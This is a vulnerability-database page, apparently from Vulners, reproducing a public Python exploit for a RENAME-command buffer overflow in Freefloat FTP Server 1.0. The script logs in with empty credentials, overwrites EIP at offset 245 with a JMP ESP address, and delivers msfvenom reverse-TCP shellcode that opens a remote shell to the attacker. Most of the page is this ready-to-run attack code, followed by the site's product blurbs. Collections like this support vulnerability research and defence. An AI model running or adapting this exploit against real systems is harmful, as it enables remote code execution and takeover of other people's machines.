Vulners
Lucene search
Freefloat FTP Server 1.0 - 'RENAME' Remote Buffer Overflow
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server RENAME Command Buffer Overflow Exploit
# Date: 29/10/2016
# Exploit Author: Eagleblack
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows XP Profesional SP3 Spanish version x86
# CVE : N/A
#Description: FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a
# long chain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry
# he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain
# a remote code execution on the system that is running the FTP Server, in this case Windows XP.
import socket
ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer
#Metasploit shellcode:
#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
"\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
"\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
"\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
"\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
"\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
"\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
"\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
"\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
"\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
"\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
"\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
"\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
"\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
"\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
"\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
"\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
"\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
"\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
"\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
"\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
"\x33\x93\xbd\x45\x33\xb6")
buffer = '\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245
print "Sending Buffer"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target
s.recv(1024) #FTPBanner
s.send('USER \r\n') #Sending USER (Null user)
s.recv(1024)
s.send('PASS \r\n') #Sending Password (Null password)
s.recv(1024)
s.send('RENAME' + buffer +'\r\n')
s.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Nov 2016 00:00Current
7.4High risk
Vulners AI Score7.4